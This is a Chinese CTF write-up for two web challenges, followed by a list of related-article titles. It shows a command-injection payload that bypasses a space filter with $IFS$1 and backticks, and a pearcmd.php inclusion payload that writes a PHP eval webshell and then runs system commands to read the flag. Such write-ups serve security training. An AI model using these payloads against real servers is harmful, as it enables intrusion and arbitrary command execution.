BUUCTF [GXYCTF2019]Ping Ping Ping easywill
题目地址:BUUCTF在线评测
考点:ping命令相关命令执行
这里过滤了flag和空格
绕过空格可以使用
$IFS$1
使用ls命令查询目录
?ip=127.0.0.1;ls
发现有两个文件,一个是flag.php,另一个是index.php。
cat获取文件内容,过滤了flag,所以flag.php无效,但可以访问index.php,查看源码
?ip=127.0.0.1;cat$IFS$1index.php
过滤了很多东西,包括flag。
可以使用反引号是作为内联执行,`ls`即可解释为输出index.php以及flag.php的内容,那么flag就可以输出出来了。
?ip=127.0.0.1;cat$IFS$1`ls`
访问源代码:
拿到flag.
flag{8b1f0054-5f92-402d-ad1a-ecc5ebcf0777}
[HXBCTF 2021]easywill
利用pearcmd.php进行文件包含。
在burpsuite里抓包将参数传进去,然后再放包,不然<>
会被url编码,导致写入的一句话木马失效。
?name=cfile&value=/usr/local/lib/php/pearcmd.php&+config-create+/<?=eval($_POST[0])?>+/tmp/aa.php
接着访问:
?name=cfile&value=/tmp/aa.php
POST传参:
0=system('ls /');
命令执行查看目录,知道flag在
flag32897328937298hdwidh下面
直接拿flag:
0=system('cat /flag32897328937298hdwidh');
BUUCTF [GXYCTF2019]Ping Ping Ping easywill相关推荐
- buuctf[GXYCTF2019]Ping Ping Ping
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行p ...
- linux命令菜鸟ping,Linux ping命令
Linux ping命令 Linux ping命令用于检测主机. 执行ping指令会使用ICMP传输协议,发出要求回应的信息,若远端主机的网络功能没有问题,就会回应该信息,因而得知该主机运作正常. 语 ...
- 复制vmware overLay网络无法ping通 ping www.baidu.com可以
因为忘记关闭防火墙了!!!!! 要永久关闭!! 修改hostname https://blog.csdn.net/qq_27327261/article/details/109100219 关闭 ...
- linux使用ping命令ping本机,Linux下使用ping命令判断网络的好坏
简介 在Linux系统里面如果想判断网络的好坏,脑海中蹦出的第一个命令就是ping了. ping命令基本是最常用的网络命令,它可以用来测试与目标主机的连通性. ping通过发送ICMP ECHO_RE ...
- 虚拟机ping网关ping不通
虚拟机ping网关ping不通,可能自己遇到的比较奇特,开始访问正常,过一段时间就不正常,分享一下解决办法: 首先ping同网段的可以ping的通,说明vmnet8的ipv4不和虚拟机配置的vmnet ...
- 全网超详细的如何Ping特定的端口号,比如telnet Ping,nc Ping,nmap Ping等
文章目录 1. 文章引言 2. ping特定端口 2.1 使用telnet ping特定端口 2.2 使用nc ping特定端口 2.3 使用nmap ping端口 2.4 使用Powershell ...
- C# ping命令,ping网络状态
Ping ping = new Ping(); PingReply pingReply = ping.Send("192.168.1.1"); //网络状态 if (pingRep ...
- BUUCTF [GXYCTF2019] 禁止套娃
题目分析 这题对我这个小白来说好难理解,慢慢补坑吧.PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通. 打开题目,只有如下: 看源码也没有什么东西,常见的信息泄露:robots ...
- BUUCTF | [GXYCTF2019]BabySQli
BUUCTF | [GXYCTF2019]BabySQli 一.必备基础知识 当=号被过滤了使用like,rlike绕过 当or被过滤了使用大小写绕过,双写绕过,&&绕过 二.实战化渗 ...
最新文章
- YOLOV5的多主干网络backbone实现(Mobilenetv3Small、EagleEye、EfficientNetLite-0、PP-LCNet-1x、SwinTrans-YOLOv5等)
- linux shell 实现循环输出
- 【全网最全的博客美化系列教程】06.推荐和反对炫酷样式的实现
- 添加python虚拟环境
- Python基础之条件判断
- android用什么测试类,android – 使用firebase对类进行JUnit测试
- 未来机器人哆拉A梦身上的高科技程序应用
- 推荐一款优雅高效的免费在线APP原型工具
- 【Java】UDP Socket编程案例——文件传输聊天工具
- JAVA调试出现不断在ClassLoader类中执行时的问题?
- 敏感性分析算法 程序_计算机程序设计艺术(TAOCP)精读笔记1 - 算法分析真正应该有的样子 Part 1...
- Android Button 实现透明 + 圆角按钮效果
- python--------集合练习题(问卷的调查)
- FusionChartsFree的JSP标签开发
- 解决System进程占用80端口
- 在线流程图和思维导图开发技术详解(一)
- 华为交换机 查ip冲突_华为交换机如何查看本交换机IP地址?
- Katalon Studio:一款静候你使用的免费自动化测试工具
- 学会了C语言究竟能干什么呢?
- Zookeeper 深入进阶 —— ZAB 协议
热门文章
- SQL Server获取特定字符前的数字
- dlib人脸比对程序设计(C++)
- vscode写php高亮,vscode如何设置代码高亮_编程开发工具
- 一看就会的Chromedriver(谷歌浏览器驱动)安装教程
- Codeforces Round #739 (Div. 3) 「A B C D E F1 F2」
- c++设计一个模拟网上购书的结账系统
- 育儿品牌“亲宝宝”获数亿元C轮融资,好未来领投,顺为、复星跟投
- Linux 查找最大文件
- VIJOS-P1571 笨笨的导弹攻击
- 入侵防御之snort规则编写